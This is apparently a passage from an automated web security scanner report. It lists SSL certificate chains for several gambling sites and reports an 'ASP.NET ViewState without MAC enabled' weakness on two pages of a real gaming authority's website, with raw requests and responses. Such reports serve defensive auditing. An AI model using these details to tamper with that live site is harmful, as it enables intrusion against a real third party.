Valid to:	Thu Apr 19 10:37:25 CDT 2012

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 10:32:00 CDT 2006
Valid to:	Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

9.9. https://download.neogames-tech.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://download.neogames-tech.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	download.neogames-tech.com
Issued by:	Thawte Server CA
Valid from:	Mon Apr 05 19:00:00 CDT 2010
Valid to:	Sun May 06 18:59:59 CDT 2012

Certificate chain #1

Issued to:	Thawte Server CA
Issued by:	Thawte Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

9.10. https://games.betsson.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://games.betsson.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.betsson.com
Issued by:	COMODO High-Assurance Secure Server CA
Valid from:	Sun Apr 17 19:00:00 CDT 2011
Valid to:	Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:	COMODO High-Assurance Secure Server CA
Issued by:	AddTrust External CA Root
Valid from:	Thu Apr 15 19:00:00 CDT 2010
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

9.11. https://in.getclicky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://in.getclicky.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.getclicky.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Mon Aug 09 18:49:23 CDT 2010
Valid to:	Sun Aug 09 18:49:23 CDT 2015

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	http://www.valicert.com/
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:19:54 CDT 1999
Valid to:	Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:19:54 CDT 1999
Valid to:	Tue Jun 25 19:19:54 CDT 2019

9.12. https://livecasino.betsson.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://livecasino.betsson.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.betsson.com
Issued by:	COMODO High-Assurance Secure Server CA
Valid from:	Sun Apr 17 19:00:00 CDT 2011
Valid to:	Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:	COMODO High-Assurance Secure Server CA
Issued by:	AddTrust External CA Root
Valid from:	Thu Apr 15 19:00:00 CDT 2010
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

9.13. https://members.bet365.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://members.bet365.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	members.bet365.com
Issued by:	Thawte SSL CA
Valid from:	Sun Nov 14 18:00:00 CST 2010
Valid to:	Thu Nov 14 17:59:59 CST 2013

Certificate chain #1

Issued to:	Thawte SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	thawte Primary Root CA
Issued by:	thawte Primary Root CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

9.14. https://poker.betsson.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://poker.betsson.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.betsson.com
Issued by:	COMODO High-Assurance Secure Server CA
Valid from:	Sun Apr 17 19:00:00 CDT 2011
Valid to:	Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:	COMODO High-Assurance Secure Server CA
Issued by:	AddTrust External CA Root
Valid from:	Thu Apr 15 19:00:00 CDT 2010
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

9.15. https://scratch.betsson.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.betsson.com
Issued by:	COMODO High-Assurance Secure Server CA
Valid from:	Sun Apr 17 19:00:00 CDT 2011
Valid to:	Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:	COMODO High-Assurance Secure Server CA
Issued by:	AddTrust External CA Root
Valid from:	Thu Apr 15 19:00:00 CDT 2010
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

9.16. https://seal.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://seal.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	seal.verisign.com
Issued by:	VeriSign Class 3 Secure Server CA - G2
Valid from:	Tue Jul 06 19:00:00 CDT 2010
Valid to:	Sun Jul 06 18:59:59 CDT 2014

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G2
Issued by:	VeriSign Trust Network
Valid from:	Tue Mar 24 19:00:00 CDT 2009
Valid to:	Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:	VeriSign Trust Network
Issued by:	VeriSign Trust Network
Valid from:	Sun May 17 19:00:00 CDT 1998
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:	VeriSign Trust Network
Issued by:	VeriSign Trust Network
Valid from:	Sun May 17 19:00:00 CDT 1998
Valid to:	Tue Aug 01 18:59:59 CDT 2028

9.17. https://sealinfo.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sealinfo.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	sealinfo.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Mar 22 19:00:00 CDT 2010
Valid to:	Thu Mar 22 18:59:59 CDT 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

9.18. https://secure.neogames-tech.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	secure.neogames-tech.com
Issued by:	VeriSign Class 3 Secure Server CA - G3
Valid from:	Mon Nov 01 19:00:00 CDT 2010
Valid to:	Sat Dec 01 17:59:59 CST 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

9.19. https://static.getclicky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://static.getclicky.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.getclicky.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Mon Aug 09 18:49:23 CDT 2010
Valid to:	Sun Aug 09 18:49:23 CDT 2015

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	http://www.valicert.com/
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:19:54 CDT 1999
Valid to:	Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:19:54 CDT 1999
Valid to:	Tue Jun 25 19:19:54 CDT 2019

9.20. https://www.betsson.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.betsson.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Tue Apr 06 19:00:00 CDT 2010
Valid to:	Fri Apr 06 18:59:59 CDT 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

9.21. https://www.interwetten.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.interwetten.com
Issued by:	Thawte Premium Server CA
Valid from:	Tue Jan 12 18:00:00 CST 2010
Valid to:	Fri Apr 13 18:59:59 CDT 2012

Certificate chain #1

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

9.22. https://www.macromedia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macromedia.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.macromedia.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Wed Dec 09 18:00:00 CST 2009
Valid to:	Sat Dec 10 17:59:59 CST 2011

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 19:00:00 CDT 1997
Valid to:	Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

9.23. https://www.neogamespartners.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neogamespartners.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.neogamespartners.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Thu Feb 10 03:39:51 CST 2011
Valid to:	Fri Mar 23 02:34:49 CDT 2012

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	http://www.valicert.com/
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:19:54 CDT 1999
Valid to:	Tue Jun 25 19:19:54 CDT 2019

9.24. https://www.norskelodd.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.norskelodd.com
Issued by:	UTN - DATACorp SGC
Valid from:	Thu Sep 16 19:00:00 CDT 2010
Valid to:	Mon Sep 16 18:59:59 CDT 2013

Certificate chain #1

Issued to:	UTN - DATACorp SGC
Issued by:	UTN - DATACorp SGC
Valid from:	Thu Jun 24 13:57:21 CDT 1999
Valid to:	Mon Jun 24 14:06:30 CDT 2019

9.25. https://www.postcodelottery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.postcodelottery.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.postcodelottery.com
Issued by:	Thawte Premium Server CA
Valid from:	Tue Aug 05 19:00:00 CDT 2008
Valid to:	Sat Aug 06 18:59:59 CDT 2011

Certificate chain #1

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

10. ASP.NET ViewState without MAC enabled previous next
There are 2 instances of this issue:

/lga/content.aspx
/lga/home.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

10.1. http://www.lga.org.mt/lga/content.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lga.org.mt
Path:	/lga/content.aspx

Request

GET /lga/content.aspx?id=109045 HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=kpe2x045cuhwf145d5bbn545; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14976

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <title>LGA ::
           Licensed Operators: Class 4
       </title>
       <meta content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" value="dDwtMjA2NTI0ODY2Nzt0PDtsPGk8MD47PjtsPHQ8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxwXD4mbmJzcFw7XDwvcFw+DQpcPHRhYmxlIGJvcmRlcj0iMCIgY2VsbHBhZGRpbmc9IjAiIGNlbGxzcGFjaW5nPSIwIiB3aWR0aD0iMzQ0Ilw+DQpcPGNvbCB3aWR0aD0iMzQ0Ilw+XDwvY29sXD4gDQpcPHRib2R5XD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3IiB3aWR0aD0iMzQ0Ilw+MzZHYW1pbmcgICBMdGQgKGV4IGlCdXRsZXIgR2FtZXMgTHRkKVw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+QWxpcXVhbnR1bSAgIEdhbWluZyBMdGRcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPkIzVyBMdGRcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPkJldGEgTWFsdGEgICBMdGRcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPkJldHNzb24gICBQbGF0Zm9ybSBTb2x1dGlvbnMgTHRkIChCZXR0aW5nKVw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+QmV0c3NvbiAgIFBsYXRmb3JtIFNvbHV0aW9ucyBMdGQgKENhc2lubylcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPkJldHNzb24gICBQbGF0Zm9ybSBTb2x1dGlvbnMgTHRkIChQb2tlcilcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPkJvYXJkIEdhbWVzICAgSXNsYW5kcyBMdGRcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPkJvc3MgTWVkaWEgICBNYWx0YSBDYXNpbm8gTHRkXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5Cb3NzIE1lZGlhICAgTWFsdGEgQ2FzaW5vIEx0ZCZuYnNwXDsgKEJpbmdvKVw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+Qm9zcyBNZWRpYSBNYWx0YSBQb2tlciBMdGQmbmJzcFw7XDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5DaGFydHdlbGwgICBHYW1lcyAoTWFsdGEpIEx0ZFw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+Q3liZXJzbG90eiAgIFNlcnZpY2VzIE1hbHRhIEx0ZFw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+RW50cmFjdGlvbiAgIE5ldHdvcmsgTHRkIChleCBCMkIgUG9rZXIgTmV0d29yayBMdGQpXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5FdXJvY2FrZSAgIE5ldHdvcmsgTHRkXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5HcmVlbnR1YmUgICBNYWx0YSBMdGRcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPkdyZWVudHViZSAgIE1hbHRhIEx0ZFw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+R3JpbmRlciBMdGRcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPkludm9sdmUgICBMdGQmbmJzcFw7ICh0byBjaGFuZ2UgdG8gVGFpbiBNYWx0YSBMdGQpXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5KYWRlc3RvbmUgICBOZXR3b3JrcyAoTWFsdGEpIEx0ZFw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+TWVkaWFsaXZlICAgQ2FzaW5vIEx0ZFw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+TWVkaWFsaXZlY2FzaW5vICAgTHRkIChleCBQdW50b0Nhc2lubyBMdGQpXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5NZWxpdGEgR2FtaW5nICAgTmV0d29yayBMdGRcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPk1HTSBTZXJ2aWNlICAgUHJvdmlkZXIgTGltaXRlZFw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+TWljcm9nYW1pbmcgICBFdXJvcGUgTHRkIC0gQ2FzaW5vXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5NaWNyb2dhbWluZyAgIE1hbHRhIEx0ZCAtIFBva2VyXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5Nb3dqb3cgICBUZWNobm9sb2d5IEx0ZCAoZXggRXVyb3BsYXkgKE1hbHRhKSBMdGQpXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5OZW9nYW1lcyAgIE5ldHdvcmsgTHRkXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5OZXQgICBFbnRlcnRhaW5tZW50IE1hbHRhIEx0ZFw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+UG9sY28gTHRkXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5QVCBHYW1lcyBMdGQgICAoQ2FzaW5vKVw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+UFQgR2FtZXMgTHRkICAgKFBva2VyKVw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+UlZHICAgVGVjaG5vbG9naWVzIEx0ZCAoZXggQmV0b25vYmV0IEx0ZClcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPlJWRyAgIFRlY2hub2xvZ2llcyBMdGQgKGV4IEJldG9ub2JldCBMdGQpXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5TQiBTb2Z0d2FyZSAgIEx0ZFw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+U3BvcnRhbG5ldCAgIExpbWl0ZWQgKENhc2lubylcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPlNwb3J0YWxuZXQgICBMdGQgKFBva2VyKVw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+U3dpc3NnYW1lICAgTWFsdGEgTHRkXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5UaGUgR2FtZSAgIEZhY3RvcnkgKE1hbHRhKSBMdGRcPC90ZFw+DQpcPC90clw+DQpcPHRyIGhlaWdodD0iMTciXD4NClw8dGQgaGVpZ2h0PSIxNyJcPlZ1ZXRlYyAgIChNYWx0YSkgTHRkXDwvdGRcPg0KXDwvdHJcPg0KXDx0ciBoZWlnaHQ9IjE3Ilw+DQpcPHRkIGhlaWdodD0iMTciXD5XYWdlckxvZ2ljICAgQ2FzaW5vIFNvZnR3YXJlIEx0ZFw8L3RkXD4NClw8L3RyXD4NClw8dHIgaGVpZ2h0PSIxNyJcPg0KXDx0ZCBoZWlnaHQ9IjE3Ilw+V29ybGQgTWF0Y2ggICBMdGRcPC90ZFw+DQpcPC90clw+DQpcPC90Ym9keVw+DQpcPC90YWJsZVw+Oz4+Ozs+Oz4+Oz4+Oz4=" />
...[SNIP]...

10.2. http://www.lga.org.mt/lga/home.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lga.org.mt
Path:	/lga/home.aspx

Request

GET /lga/home.aspx HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=3cjspfm1kdxdaju4khdahw45; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8964

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <TITLE>Lotteries and Gaming Authority .. 2008 </TITLE>
       <meta content="Lo
...[SNIP]...
